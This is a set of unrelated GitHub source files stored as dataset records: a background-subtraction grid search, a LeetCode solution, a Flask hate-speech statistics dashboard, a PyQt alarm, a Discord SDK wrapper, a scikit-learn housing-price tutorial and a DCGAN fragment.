np.meshgrid(alpha_values, rho_values)\n surf = ax.plot_surface(X, Y, f1_results, cmap='plasma',\n linewidth=0, antialiased=True)\n fig.colorbar(surf)\n\n ax.set_xlabel('alpha', size='large', weight='bold')\n ax.set_ylabel('rho', size='large', weight='bold')\n ax.set_zlabel('f1', size='large', weight='bold')\n\n plt.title(title)\n plt.show()\n\n return fig\n\n\ndef grid_search(dataset, alpha_values, rho_values, beta):\n \"\"\"Perform a grid search over rho and alpha hyperparameters\"\"\"\n # Load datasets\n train_start, train_end = dataset_train_idx[dataset]\n test_start, test_end = dataset_test_idx[dataset]\n train = cdnet.read_dataset(dataset, train_start, train_end,\n colorspace='gray', annotated=False)\n test, gt = cdnet.read_dataset(dataset, test_start, test_end,\n colorspace='gray', annotated=True)\n\n # Initial model\n model = bg_subtraction.create_model(train)\n model_backup = deepcopy(model)\n\n # Grid search\n f_results = np.zeros((len(rho_values), len(alpha_values)), dtype='float32')\n\n for i, rho in enumerate(rho_values):\n for j, alpha in enumerate(alpha_values):\n pred = bg_subtraction.predict(test, model, alpha, rho=rho)\n summary = metrics.eval_from_mask(pred, gt[:,0,:,:], gt[:,1,:,:])\n f_results[i, j] = metrics.f_score(summary, beta=beta)\n print('- alpha {:0.2f}, rho {:0.2f}: {:0.4f}'.format(\n alpha, rho, f_results[i, j]))\n\n animate(test, model_backup, f_results, beta, dataset, alpha_values, rho_values)\n return f_results\n\n\ndef run(dataset):\n \"\"\"Task 2.1\n\n Grid search for hyperparameter selection in background estimation with\n adaptive model\n\n \"\"\"\n betas 
= [10, 12, 14]\n\n # Hyperparameters values to test\n if dataset == 'highway':\n alpha_values = np.arange(0, 8, 0.25)\n rho_values = np.arange(0, 1, 0.10)\n elif dataset == 'fall':\n alpha_values = np.arange(0, 8, 0.25)\n rho_values = np.arange(0, 1, 0.10)\n elif dataset == 'traffic':\n alpha_values = np.arange(0, 6, 0.20)\n rho_values = np.arange(0, 0.4, 0.05)\n\n # Grid search\n for beta in betas:\n f_results = grid_search(dataset, alpha_values, rho_values, beta)\n\n # Find best score\n best_f = f_results.max()\n best_rho, best_alpha = np.unravel_index(np.argmax(f_results),\n f_results.shape)\n\n print('Best parameters for Beta= {:0.1f}: alpha {:0.2f}, rho {:0.2f}, '\n 'with F-score {:0.4f}'.format(beta, alpha_values[best_alpha],\n rho_values[best_rho], best_f))\n\n # Plot results and print best parameters\n plot_grid_search(alpha_values, rho_values, f_results,\n title=dataset)\n","repo_name":"mcv-m6-video/mcv-m6-2018-team9","sub_path":"week3/task1_f1metric.py","file_name":"task1_f1metric.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"24453269568","text":"class Solution:\n def minSpeedOnTime(self, dist: List[int], hour: float) -> int:\n left = 1\n right = 10**7 + 1\n \n def computeSpeed(assumeSpeed):\n res = 0\n n = len(dist)\n for i in range(0,n-1):\n val = math.ceil(dist[i]/assumeSpeed)\n res+=val\n res+=dist[-1]/assumeSpeed\n return res\n res = -1\n while left', methods=['GET'])\ndef gold_analysis(type):\n\n if type == 1:\n return render_template('frontend/plot1.html', url=url_for('front.visualize_plot1'),\n title=\"Normalize len of word from tweet Distribution Plot\")\n elif type == 2:\n return render_template('frontend/plot1.html', url=url_for('front.visualize_plot2'),\n title=\"15 Most Frequent Abusive Word\")\n elif type == 3:\n return render_template('frontend/plot1.html', url=url_for('front.visualize_plot3'),\n title=\"Most Frequent Hate speech Category\")\n\n\n@front.route('/visualize/plot1')\ndef visualize_plot1():\n fig, ax = plt.subplots(figsize=(20, 10))\n\n # ternyata ada kata2 yang terdaftar di abusive seperti sipit tidak ada flag abusive atau HSnya\n # query text yang ter log atau terdeteksi di alayabusivelog yang terdaftar sebagai mixed atau abusive\n # ada 3 tipe yaitu abusive, alay, dan mixed(kata alay yang ternyata artinya adalah abusive word)\n df_file = pd.read_sql_query(\n sql=db.select(\n [FileTextLog.ID, FileTextLog.Tweet, FileTextLog.Clean, AlayAbusiveFileLog.word, AlayAbusiveFileLog.clean])\n .join(AlayAbusiveFileLog, AlayAbusiveFileLog.file_upload_text_log_id == FileTextLog.ID)\n .filter(AlayAbusiveFileLog.foul_type != \"ALAY\"),\n con=db.engine\n )\n # 15 abusive clean word terbanyak\n # print(df_file['clean'].value_counts()[:15])\n # # 15 abusive raw word terbanyak\n # print(df_file['word'].value_counts()[:15])\n # #\n # print(df_file['Tweet'].value_counts()[:15])\n\n # coba assign word count\n df_new = (\n df_file\n .groupby('Tweet')\n .agg({'word': 'count'}) # jumlah abusivenya\n .sort_values('word', ascending=False)\n .reset_index()\n .assign(\n len_char=lambda x: x['Tweet'].str.len(),\n len_word=lambda x: x['Tweet'].str.split().str.len() # jumlah katanya\n )\n )\n\n # jumlah tweet yang mengandung abusive dan hatespeech\n # print(df_new.head())\n # median\n # print(df_new.median(numeric_only=True))\n # q1\n q1 = df_new['len_word'].quantile(0.25)\n # print(q1)\n # q2\n q2 = df_new['len_word'].quantile(0.5)\n # print(q2)\n # q3\n q3 = 
df_new['len_word'].quantile(0.75)\n # print(q3)\n\n iqr = q3 - q1\n # print(iqr)\n limit = 1.5 * iqr\n lower_bound = q1 - limit\n upper_bound = q3 + limit\n\n # print(lower_bound)\n # hasilnya -13\n # print(upper_bound)\n # hasilnya 43\n # print(df_new['len_word'].max())\n # max ada di 52\n # berarti ada outlier\n\n df_remove = df_new[df_new['len_word'] < upper_bound]\n df_remove_outlier = df_remove[df_remove['len_word'] > lower_bound]\n min_max_scaler = p.MinMaxScaler()\n\n normalize_len_word = min_max_scaler.fit_transform(df_remove_outlier['len_word'].values.reshape(-1,1))\n df_with_norm = df_remove_outlier.assign(normalized=normalize_len_word.flatten())\n # print(df_with_norm)\n # print(df_with_norm['normalized'].skew())\n # print(df_with_norm['normalized'].mean())\n # print(df_with_norm['normalized'].median())\n sns.histplot(df_with_norm['normalized'], kde=True)\n\n canvas = FigureCanvas(fig)\n img = io.BytesIO()\n fig.savefig(img)\n img.seek(0)\n\n return send_file(img, mimetype='img/png')\n\n@front.route('/visualize/plot2')\ndef visualize_plot2():\n fig, ax = plt.subplots(figsize=(20, 10))\n\n # ternyata ada kata2 yang terdaftar di abusive seperti sipit tidak ada flag abusive atau HSnya\n # query text yang ter log atau terdeteksi di alayabusivelog yang terdaftar sebagai mixed atau abusive\n # ada 3 tipe yaitu abusive, alay, dan mixed(kata alay yang ternyata artinya adalah abusive word)\n df_file = pd.read_sql_query(\n sql=db.select(\n [FileTextLog.ID, FileTextLog.Tweet, FileTextLog.Clean, AlayAbusiveFileLog.word, AlayAbusiveFileLog.clean])\n .join(AlayAbusiveFileLog, AlayAbusiveFileLog.file_upload_text_log_id == FileTextLog.ID)\n .filter(AlayAbusiveFileLog.foul_type != \"ALAY\"),\n con=db.engine\n )\n # # 15 abusive clean word terbanyak\n xy = df_file['clean'].value_counts()[:15]\n\n x = list(xy.keys())\n y = list(xy.values)\n\n # # 15 abusive raw word terbanyak\n # print(df_file['word'].value_counts()[:15])\n # #\n # print(df_file['Tweet'].value_counts()[:15])\n sns.barplot(x=x, y=y)\n\n canvas = FigureCanvas(fig)\n img = io.BytesIO()\n fig.savefig(img)\n img.seek(0)\n\n return send_file(img, mimetype='img/png')\n\n@front.route('/visualize/plot3')\ndef visualize_plot3():\n fig, ax = plt.subplots(figsize=(20, 10))\n # ternyata ada kata2 yang terdaftar di abusive seperti sipit tidak ada flag abusive atau HSnya\n # query text yang ter log atau terdeteksi di alayabusivelog yang terdaftar sebagai mixed atau abusive\n # ada 3 tipe yaitu abusive, alay, dan mixed(kata alay yang ternyata artinya adalah abusive word)\n df_file = pd.read_sql_query(\n sql=db.select(\n [FileTextLog.ID, FileTextLog.Tweet, FileTextLog.Clean, FileTextLog.HS, FileTextLog.Abusive,\n FileTextLog.HS_Gender, FileTextLog.HS_Group, FileTextLog.HS_Individual, FileTextLog.HS_Race,\n FileTextLog.HS_Physical, FileTextLog.HS_Religion, FileTextLog.HS_Strong, FileTextLog.HS_Weak,\n FileTextLog.HS_Moderate, FileTextLog.HS_Other, AlayAbusiveFileLog.word, AlayAbusiveFileLog.clean])\n .join(AlayAbusiveFileLog, AlayAbusiveFileLog.file_upload_text_log_id == FileTextLog.ID)\n .filter(AlayAbusiveFileLog.foul_type != \"ALAY\"),\n con=db.engine\n )\n\n sums = df_file.select_dtypes(np.number).sum().rename('total')\n sums.pop('ID')\n # print(sums)\n x = list(sums.keys())\n y = list(sums.values)\n\n # print(x)\n # print(y)\n # # 15 abusive raw word terbanyak\n # print(df_file['word'].value_counts()[:15])\n # #\n # print(df_file['Tweet'].value_counts()[:15])\n sns.barplot(x=x, y=y)\n\n canvas = FigureCanvas(fig)\n img = io.BytesIO()\n 
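# render the figure into the in-memory buffer, then rewind to byte 0 so send_file streams the PNG from the start\n    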
fig.savefig(img)\n img.seek(0)\n return send_file(img, mimetype='img/png')\n","repo_name":"galihsuyoga/cleansingText","sub_path":"main/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":7298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"5451981120","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5 import uic\nimport sys\n\nfrom timer import MyDialog\n\n\n\nclass MyWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n uic.loadUi('MainWindow.ui', self)\n # self.spinBox.valueChanged.connect(self.pb_guncelle)\n now = QDateTime.currentDateTime()\n \n self.timer = QTimer()\n self.d = MyDialog()\n self.d.kabuletti.connect(self.test)\n self.d.exec()\n self.dateTimeEdit.setDateTime(now)\n self.btnSetAlarm.clicked.connect(self.alarm_kur)\n self.msg = QMessageBox()\n self.msg.setText(\"asdasd\")\n self.msg.setStandardButtons(QMessageBox.Yes | QMessageBox.Cancel)\n self.msg.accepted.connect(self.test)\n self.msg.rejected.connect(self.rej)\n self.msg.exec()\n def rej(self):\n print('nooooo')\n def test(self, isim):\n print(isim)\n\n def alarm_kur(self):\n \n now = QDateTime.currentDateTime()\n zaman = self.dateTimeEdit.dateTime()\n\n fark = now.msecsTo(zaman)\n\n if fark < 1:\n mb = QMessageBox()\n mb.setText(\"hata\")\n mb.exec()\n return\n\n # butonu disable et\n self.btnSetAlarm.setEnabled(False)\n \n self.timer.timeout.connect(self.tick)\n self.timer.start((fark *5) / 100)\n\n\n def tick(self):\n pb_deger = self.progressBar.value()\n self.pb_guncelle(pb_deger - 5)\n\n if pb_deger < 1:\n self.timer.stop()\n self.btnSetAlarm.setEnabled(True)\n self.progressBar.setValue(100)\n\n def pb_guncelle(self, sayi):\n self.progressBar.setValue(sayi)\n\napp = QApplication(sys.argv)\nmw = MyWindow()\nmw.show()\nsys.exit(app.exec_())","repo_name":"bkayranci/pyqt-alarm","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"72258287628","text":"import discordsdk as dsdk\nimport time, uuid\n\nimport pygame\nfrom maintenance import process_exists\nfrom PIL import Image\n\n\nclass Discord():\n def __init__(self, mixer):\n if process_exists(\"discord.exe\"):\n self.discord_active = True\n else:\n self.discord_active = False\n\n self.mixer = mixer\n self.portrait = None\n\n if self.discord_active:\n discord_application_id = 1097332146923913288\n self.app = dsdk.Discord(discord_application_id, dsdk.CreateFlags.default)\n\n self.activity_manager = self.app.get_activity_manager()\n self.activity_manager.on_activity_join_request = self.on_activity_join_request\n time.sleep(0.2)\n #\n self.activity_manager.on_activity_join = self.on_activity_join\n self.activity_manager.on_activity_invite = self.on_activity_invite\n time.sleep(0.2)\n\n self.user_manager = self.app.get_user_manager()\n self.image_manager = self.app.get_image_manager()\n time.sleep(0.2)\n\n self.user_manager.on_current_user_update = self.on_current_user_update\n time.sleep(0.2)\n\n # setup activity\n self.activity = dsdk.Activity()\n self.activity.state = \"Just started\"\n\n # activity icon\n self.activity.assets.large_image = \"https://i.imgur.com/thAl2Ll.png\"\n\n # update the activity\n self.update_discord_status(\"Just Started\")\n\n def on_activity_join(self, join_secret):\n print(\"Activity Joined\")\n\n def on_activity_invite(self, type, user, activity):\n 
print(\"Activity Invite Received\")\n\n def update_party(self, min, max):\n # party settings\n print(\"party updated\")\n self.activity.party.id = str(uuid.uuid4())\n self.activity.party.size.current_size = min\n self.activity.party.size.max_size = max\n self.activity.secrets.join = str(uuid.uuid4())\n self.activity.timestamps.start = int(time.time())\n self.activity_manager.update_activity(self.activity, lambda result: self.debug_callback(\"update_activity\", result))\n\n def get_portrait(self):\n # handle\n handle = dsdk.ImageHandle()\n handle.type = dsdk.ImageType.user\n handle.id = self.user.id\n handle.size = 256\n\n self.image_manager.fetch(handle, True, self.on_image_loaded)\n\n return self.portrait\n\n def get_username(self):\n return [self.user.username, self.user.discriminator]\n\n def on_current_user_update(self):\n self.user = self.user_manager.get_current_user()\n print(f\"Hello, {self.user.username}#{self.user.discriminator}\")\n\n self.get_portrait()\n\n def on_image_loaded(self, result, handle):\n if result != dsdk.Result.ok:\n print(f\"Failed to fetch the image (result {result})\")\n else:\n print(\"Fetched the image!\")\n print(\"Handle:\", handle.type, handle.id, handle.size)\n\n dimensions = self.image_manager.get_dimensions(handle)\n print(\"Dimensions:\", dimensions.width, dimensions.height)\n\n # we load the image\n data = self.image_manager.get_data(handle)\n im = Image.frombytes(\"RGBA\", (dimensions.width, dimensions.height), data)\n self.portrait = pygame.image.fromstring(im.tobytes(), im.size, im.mode).convert() # type: ignore\n\n def on_activity_join_request(self, user):\n print(f\"{user.username} wants to join you\")\n self.mixer.sound_play('resources/sounds/Join.mp3')\n\n def debug_callback(self, debug, result, *args):\n print(debug, \"success\") if result == dsdk.Result.ok else print(debug, \"failure\", result, args)\n\n def update_discord_status(self, state):\n if self.discord_active:\n self.activity.state = state\n self.activity_manager.update_activity(self.activity, lambda result: self.debug_callback(\"update_activity\", result))\n\n def tick(self):\n # Call required updates\n if self.is_active():\n try:\n self.app.run_callbacks()\n except:\n self.disable()\n\n def is_active(self):\n return self.discord_active\n\n def clear_activity(self):\n self.activity_manager.clear_activity\n\n def disable(self):\n self.discord_active = False","repo_name":"BP-Feral/HotFK","sub_path":"classes/discord.py","file_name":"discord.py","file_ext":"py","file_size_in_byte":4382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"2488168718","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.compose import TransformedTargetRegressor, ColumnTransformer, make_column_transformer, make_column_selector\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split, StratifiedShuffleSplit, cross_val_score, GridSearchCV\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.pipeline import make_pipeline, Pipeline\nfrom sklearn.preprocessing import OrdinalEncoder, OneHotEncoder, MinMaxScaler, StandardScaler, FunctionTransformer\nfrom sklearn.metrics.pairwise import rbf_kernel\nfrom sklearn.tree import DecisionTreeRegressor\n\nfrom HandsOnMachineLearningProjects.A2_CustomTransformers.ClusterSimilarity 
import ClusterSimilarity\n\n\ndef column_ratio(x):\n return x[:, [0]] / x[:, [1]]\n\n\ndef ratio_name(function_transformer, feature_names_in):\n return ['ratio']\n\n\ndef ratio_pipeline():\n return make_pipeline(\n SimpleImputer(strategy='median'),\n FunctionTransformer(column_ratio, feature_names_out=ratio_name),\n StandardScaler()\n )\n\n\nif __name__ == '__main__':\n original_housing = pd.read_csv('../files/housing/housing.csv')\n housing = original_housing.copy()\n print(housing.describe())\n\n housing.hist(bins=50, figsize=(12, 8))\n plt.show()\n\n housing['income_cat'] = pd.cut(housing['median_income'], bins=[0, 1.5, 3.0, 4.5, 6., np.inf],\n labels=[1, 2, 3, 4, 5])\n housing['income_cat'].value_counts().sort_index().plot.bar(rot=0, grid=True)\n plt.xlabel('Income Category')\n plt.ylabel('Number Of Districts')\n # plt.show()\n\n splitter = StratifiedShuffleSplit(n_splits=10, test_size=0.2, random_state=42)\n strata_splits = []\n\n for train_index, test_index in splitter.split(housing, housing['income_cat']):\n strata_train_set_n = housing.iloc[train_index]\n strata_test_set_n = housing.iloc[test_index]\n strata_splits.append([strata_train_set_n, strata_test_set_n])\n\n strata_train_set, strata_test_set = train_test_split(housing, test_size=0.2, stratify=housing['income_cat'],\n random_state=42)\n\n print(strata_test_set['income_cat'].value_counts() / len(strata_test_set))\n\n for set_ in (strata_train_set, strata_test_set):\n set_.drop('income_cat', axis=1, inplace=True)\n\n housing = pd.DataFrame(strata_train_set.copy())\n\n housing.plot(kind='scatter', x='longitude', y='latitude', s=housing['population'] / 100,\n cmap='jet', label='population', colorbar=True, c='median_house_value', sharex=False\n , figsize=(10, 7))\n plt.show()\n\n # we get correlation matrix to know how attributes correlates with median_housing_value\n # (we correlate with median_house_value because we want to predict if sth is a good investment\n # so, the more valuable attribute is median_house_value)#\n corr_matrix = housing.corr()\n median_house_value_correlations = corr_matrix['median_house_value']\n print(median_house_value_correlations)\n\n best_correlation_attributes = ['median_house_value', 'median_income', 'total_rooms', 'housing_median_age']\n scatter_matrix(housing[best_correlation_attributes], figsize=(20, 10), grid=True)\n plt.show()\n\n housing.plot(kind='scatter', x='median_income', y='median_house_value')\n # plt.show()\n\n # now we are going to clean data, so, first we can want to know how many rooms per house are\n housing['rooms_per_house'] = housing['total_rooms'] / housing['households']\n\n # or know the number of bedrooms per room\n housing['bedroom_per_room'] = housing['total_bedrooms'] / housing['total_rooms']\n\n # or know how many people live in each house\n housing['people_per_household'] = housing['population'] / housing['households']\n\n # we get the correlations again to know if attributes calculated recently means something\n corr_matrix = housing.corr()\n median_house_value_correlations = corr_matrix['median_house_value']\n print(median_house_value_correlations.sort_values(ascending=False))\n\n best_correlation_attributes = ['median_house_value', 'median_income', 'housing_median_age',\n 'rooms_per_house', 'bedroom_per_room']\n scatter_matrix(housing[best_correlation_attributes], figsize=(20, 10), grid=True)\n # plt.show()\n\n # start cleaning, first we are going to separate train data and predict data(in our case median_house_value) so...\n housing = 
pd.DataFrame(strata_train_set.drop(['median_house_value'], axis=1))\n housing_labeled = strata_train_set['median_house_value'].copy()\n\n # we fill nan values with median\n simple_inputer = SimpleImputer(strategy='median')\n housing_num = housing.select_dtypes(include=[np.number])\n simple_inputer.fit(housing_num)\n\n print('median_values = ', simple_inputer.statistics_, housing_num.index)\n\n new_housing = pd.DataFrame(simple_inputer.transform(housing_num), columns=housing_num.columns.values)\n print(new_housing.info())\n\n # clean categorical attributes(we use ordinal encoder to set one number such as 1,2,3... to category types)\n housing_cat = housing[['ocean_proximity']]\n # ordinal_encoder = OrdinalEncoder()\n # housing_cat_encoded = ordinal_encoder.fit_transform(housing_cat)\n # to use ordinal Encoder Variables must have a correlation between them, so ,\n # we will use oneHotEncoder(to encoder variables in dummies)\n\n one_hot_encoder = OneHotEncoder()\n housing_cat_1hot = one_hot_encoder.fit_transform(housing_cat)\n print(housing_cat_1hot.toarray()[:8])\n print('We Can Get Categories Encoded From OneHotEncoder -> ', one_hot_encoder.categories_[0])\n print(len(new_housing), len(housing_cat_1hot.toarray()))\n ocean_proximity_df = pd.DataFrame(housing_cat_1hot.toarray(), columns=one_hot_encoder.get_feature_names_out())\n print(ocean_proximity_df.info())\n new_housing_with_dummies = pd.concat([new_housing, ocean_proximity_df], axis=1)\n\n min_max_scaler = MinMaxScaler(feature_range=(-1, 1))\n housing_with_min_max_scaler = min_max_scaler.fit_transform(new_housing_with_dummies)\n print(housing_with_min_max_scaler)\n print()\n standard_scaler = StandardScaler()\n housing_with_standard_scaler = standard_scaler.fit_transform(new_housing_with_dummies)\n print(housing_with_standard_scaler)\n\n ages = np.linspace(new_housing_with_dummies[\"housing_median_age\"].min(),\n new_housing_with_dummies[\"housing_median_age\"].max(),\n 500).reshape(-1, 1)\n\n # now we use rbf_kernel to use radial_basis_function to cut ages in a group in a range of age 35\n age_simil_35 = rbf_kernel(ages, [[35]], gamma=0.1)\n\n fig, ax1 = plt.subplots()\n\n ax1.set_xlabel(\"Housing median age\")\n ax1.set_ylabel(\"Number of districts\")\n ax1.hist(housing[\"housing_median_age\"], bins=50)\n ax2 = ax1.twinx() # create a twin axis that shares the same x-axis\n color = \"blue\"\n ax2.plot(ages, age_simil_35, color=color, label=\"gamma = 0.10\")\n ax2.tick_params(axis='y', labelcolor=color)\n ax2.set_ylabel(\"Age similarity\", color=color)\n\n plt.legend(loc=\"upper left\")\n plt.show()\n\n df_with_ages_between_30_and_40 = pd.DataFrame(strata_train_set.loc[\n (strata_train_set['housing_median_age'] >= 30) & (\n strata_train_set['housing_median_age'] <= 40)])\n\n df_with_ages_between_30_and_40 = df_with_ages_between_30_and_40.reset_index()\n df_with_ages_between_30_and_40.drop('index', axis=1, inplace=True)\n housing_median_age = df_with_ages_between_30_and_40['housing_median_age']\n prices = df_with_ages_between_30_and_40['median_house_value']\n\n order = np.lexsort([prices, housing_median_age])\n plt.scatter(housing_median_age[order], prices[order])\n # plt.show()\n\n # we can use TransformedTargetRegressor to use a linear regression and scaler in the same fit\n some_new_data = housing[['median_income']].iloc[:5]\n model = TransformedTargetRegressor(LinearRegression(), transformer=StandardScaler())\n model.fit(housing[['median_income']], housing_labeled)\n predictions = model.predict(some_new_data)\n\n 
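# TransformedTargetRegressor standardizes the target during fit and inverse-transforms predictions, so these values are back in raw price units\n    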
print(predictions)\n\n # now we use a transformer to transform data into logarithms,\n # and if you use inverse_transform you get the exponential\n log_transformer = FunctionTransformer(np.log, inverse_func=np.exp)\n log_pop = log_transformer.transform(housing[['population']])\n\n # also we can use Function Transformer to use the radial basis function mentioned before\n rbf_transformer = FunctionTransformer(rbf_kernel, kw_args=dict(Y=[[35]], gamma=0.1))\n age_simil_35_transformer = rbf_transformer.transform(ages)\n # print(age_simil_35[:10], age_simil_35_transformer[0:10])\n\n # use radial basis function with 2D array,\n # in this case this method will do the euclidian measure between the two variable\n sf_coords = 37.7749, -122.41\n rbf_transformer = FunctionTransformer(rbf_kernel, kw_args=dict(Y=[sf_coords], gamma=0.1))\n sf_simil = rbf_transformer.transform(housing[['latitude', 'longitude']])\n\n # use multiple functions\n array = np.array([[1, 2], [3, 4]])\n rbf_transformer = FunctionTransformer(lambda x: x[:, [0]] / x[:, [1]])\n\n print(rbf_transformer.transform(array))\n\n # we use SimpleImputer to fill null values with median, and after that we scale values\n num_pipeline = make_pipeline(\n SimpleImputer(strategy='median'),\n StandardScaler()\n )\n\n # if we have to encoder categorical values we will fill nun values with the most frequent\n # and after that we use oneHotEncoder to transform in dummies\n categorical_pipeline = make_pipeline(\n SimpleImputer(strategy='most_frequent'),\n OneHotEncoder()\n )\n\n preprocessing = make_column_transformer(\n (num_pipeline, make_column_selector(dtype_include=np.number)),\n (categorical_pipeline, make_column_selector(dtype_include='object'))\n )\n\n housing_with_make_column_array = preprocessing.fit_transform(original_housing)\n name_columns = list(map(lambda x: x.split('__')[1], preprocessing.get_feature_names_out()))\n housing_with_make_column = pd.DataFrame(housing_with_make_column_array, columns=name_columns)\n\n log_pipeline = make_pipeline(\n SimpleImputer(strategy='median'),\n FunctionTransformer(np.log, feature_names_out='one-to-one'),\n StandardScaler()\n )\n\n cluster_simil = ClusterSimilarity(n_clusters=10, gamma=1, random_state=42)\n\n default_num_pipeline = make_pipeline(SimpleImputer(strategy='median'), StandardScaler())\n\n preprocessing = ColumnTransformer([\n (\"bedrooms\", ratio_pipeline(), [\"total_bedrooms\", \"total_rooms\"]),\n (\"rooms_per_house\", ratio_pipeline(), [\"total_rooms\", \"households\"]),\n (\"people_per_house\", ratio_pipeline(), [\"population\", \"households\"]),\n (\"log\", log_pipeline, [\"total_bedrooms\", \"total_rooms\", \"population\",\n \"households\", \"median_income\"]),\n (\"geo\", cluster_simil, [\"latitude\", \"longitude\"]),\n (\"cat\", categorical_pipeline, make_column_selector(dtype_include=object)),\n ], remainder=default_num_pipeline)\n\n housing_preprocessed = pd.DataFrame(preprocessing.fit_transform(housing),\n columns=preprocessing.get_feature_names_out())\n\n lin_reg = make_pipeline(preprocessing, LinearRegression())\n lin_reg.fit(housing, housing_labeled)\n predictions = lin_reg.predict(housing)\n\n print(predictions[:5].round(2), '\\n', housing_labeled[:5].values.round(2))\n\n # model determination\n lin_rmse = mean_squared_error(housing_labeled, predictions, squared=False)\n print(lin_rmse)\n\n tree_reg = make_pipeline(preprocessing, DecisionTreeRegressor())\n tree_reg.fit(housing, housing_labeled)\n predictions = tree_reg.predict(housing)\n\n # model determination\n tree_rmse = 
mean_squared_error(housing_labeled, predictions, squared=False)\n print(11, tree_rmse) # this produces an overfitting (its remember data used when we trained the model )\n\n # we use this method to create 10 folds to validate the model and compare 9 to 1 with each fold\n tree_rmses = -cross_val_score(tree_reg, housing, housing_labeled, scoring='neg_root_mean_squared_error', cv=10)\n\n print('model determination Decission tree regressor', tree_rmses)\n\n forest_reg = make_pipeline(preprocessing, RandomForestRegressor(random_state=42))\n\n forest_rmses = -cross_val_score(forest_reg, housing, housing_labeled, scoring='neg_root_mean_squared_error', cv=10)\n print('model determination Forest regressor', pd.Series(forest_rmses).describe())\n\n forest_reg.fit(housing, housing_labeled)\n housing_predictions = forest_reg.predict(housing)\n forest_rmse = mean_squared_error(housing_labeled, housing_predictions,\n squared=False)\n\n print('Model error ', forest_rmse)\n\n full_pipeline = Pipeline([\n ('preprocessing', preprocessing),\n ('random_forest', RandomForestRegressor)\n ])\n\n param_grid = [\n {'preprocessing__geo__n_clusters': [5, 8, 10],\n 'random_forest__max_features': [4, 6, 8]},\n {'preprocessing__geo__n_clusters': [10, 15],\n 'random_forest__max_features': [6, 8, 10]},\n ]\n\n grid_search = GridSearchCV(full_pipeline, param_grid, cv=3, scoring='root_mean_squared_error')\n grid_search.fit(housing, housing_labeled)\n\n print(grid_search.best_params_)\n\n\n","repo_name":"RubenBBlazquez/MachineLearningBasicProjects","sub_path":"HandsOnMachineLearningProjects/Linear/PredictHousingInvestment.py","file_name":"PredictHousingInvestment.py","file_ext":"py","file_size_in_byte":13747,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"34998365543","text":"#EJERCICIO 7\n#Escribir un programa que almacene la cadena de caracteres contraseña en una \n#variable, pregunte al usuario por la contraseña hasta que introduzca la contraseña \n#correcta.\n\ncontra= 1234\ncontra_pedida=int(input(\"Ingresa una contrase–a PIN: \"))\npin_correcto=False;\n\nwhile (not pin_correcto):\n if contra==contra_pedida:\n pin_correcto=True\n print(\"Contrase–a correcta, bienvenid@\")\n else:\n print(\"Contrase–a incorrecta\")\n contra_pedida=int(input(\"Ingresa una contrase–a PIN: \"))","repo_name":"alvaromartinsalazar/IAW","sub_path":"Python/Ejercicios_Bucles/ejercicio7.py","file_name":"ejercicio7.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"19544684167","text":"from keras.models import Model, Sequential\nfrom keras.layers import Input, Dense, Reshape, concatenate\nfrom keras.layers.core import Activation, Flatten\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.convolutional import UpSampling2D, Conv2D, MaxPooling2D\nfrom keras.optimizers import SGD\nfrom keras import backend as K\nimport numpy as np\nfrom PIL import Image\nimport os\nfrom ops import imageProcess \n\nfrom GLOVEModel import GLOVEModel\n\nclass DCGan(object):\n modelName = 'dc-gan'\n \n def __init__(self):\n K.set_image_dim_ordering('tf')\n self.generator = None\n self.discriminator = None\n self.model = None\n\n self.imgWidth = 7\n self.imgHeight = 7\n self.imgChannels = 1\n self.randomInputDim = 50\n self.textInputDim = 100\n \n self.word2vecModel = GLOVEModel(self.textInputDim)\n\n self.config = None\n\n @staticmethod\n def getConfigFilePath(modelDirPath):\n 
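# the config file sits beside the weight files as dc-gan-config.npy, mirroring getWeightFilePath below\n        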
return os.path.join(modelDirPath, DCGan.modelName + '-config.npy')\n\n @staticmethod\n def getWeightFilePath(modelDirPath, modelType):\n return os.path.join(modelDirPath, DCGan.modelName + '-' + modelType + '-weights.h5')\n\n def createGenerator(self,randomInput,textInput):\n initImgWidth = self.imgWidth // 16\n initImgHeight = self.imgHeight // 16\n\n randomOutput = Dense(256)(randomInput)\n textOutput = Dense(512)(textInput)\n\n randomOutput1 = Dense(512)(randomOutput)\n textOutput1 = Dense(1024)(textOutput)\n\n randomOutput2 = Dense(1024)(randomOutput1)\n textOutput2 = Dense(2048)(textOutput1)\n\n totalInput = concatenate([textOutput1,randomOutput1])\n layer1 = Activation('tanh')(totalInput)\n\n layer2 = Dense(128 * initImgWidth * initImgHeight)(layer1)\n layer2 = BatchNormalization()(layer2)\n layer2 = Activation('tanh')(layer2)\n layer2 = Reshape((initImgWidth,initImgHeight,128),input_shape = (128 * initImgWidth * initImgHeight,))(layer2)\n\n layer3 = UpSampling2D(size = (2,2))(layer2)\n layer3 = Conv2D(64,kernel_size = 5,padding='same')(layer3)\n layer3 = Activation('tanh')(layer3)\n\n layer4 = UpSampling2D(size = (2,2))(layer3)\n layer4 = Conv2D(32,kernel_size = 5,padding='same')(layer4)\n layer4 = Activation('tanh')(layer4)\n\n layer5 = UpSampling2D(size = (2,2))(layer4)\n layer5 = Conv2D(16,kernel_size = 5,padding='same')(layer5)\n layer5 = Activation('tanh')(layer5)\n\n layer6 = UpSampling2D(size = (2,2))(layer5)\n layer6 = Conv2D(self.imgChannels,kernel_size = 